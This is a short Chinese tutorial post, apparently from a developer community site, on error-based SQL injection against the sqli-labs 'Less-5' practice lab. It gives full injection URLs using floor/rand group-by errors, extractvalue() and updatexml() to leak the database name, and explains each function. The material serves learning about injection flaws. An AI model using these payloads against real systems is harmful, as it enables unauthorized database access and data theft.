http://124.222.124.9:8888/Less-5/?id=-1' union select 1,count(*),concat((select database()),ceil(rand(0)*2)) as a from information_schema.tables group by a %23
涉及到的函数
🍄floor() 向下取整
🌸ceil() 向上取整
🥭rand() 产生[0,1)之间的随机数
🍁count() 统计总数函数
🌼group by() 分组语法
分配初始创建一个虚拟表 分两种
第一种 第一次取数据在虚拟表中进行索引,索引未发现同类项,进行二次取数,进行写入
第二种 第一次取数据在虚拟表中进行索引,索引发现同类型,直接写入,不进行二次取数
🍐concat() 拼接函数
该报错的理解:
这是因为ceil(rand(0)*2))产生的随机数是一个不确定的序列,可能这次是0下次就是1,分组之后,导致count函数异常.
🍒 extractvalue(xml_document,xpath_string)
第一个参数是xml文档对象的名称
第二个参数是从xml文档对象中返回查询到的字符串,返回长度限制在32位字符
~:ASCII码为十六进制0x7e
xml文档中查找字符位置时,使用/xxx/xxx/xxx/格式
只要写入不符合上述格式的内容,就会报错
http://124.222.124.9:8888/Less-5/?id=-1' and extractvalue(null,concat('~',(select database()),0x7e)) --+
🍒 updatexml(xml_target,xpath_expr,new_xml)
xml_target:xml对象的名称 string类型
xpath_expr:使用xpath格式的路径
new_xml:需要更新的内容
http://124.222.124.9:8888/Less-5/?id=-1' and updatexml(1,concat('~',(select database()),0x7e),2) --+
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。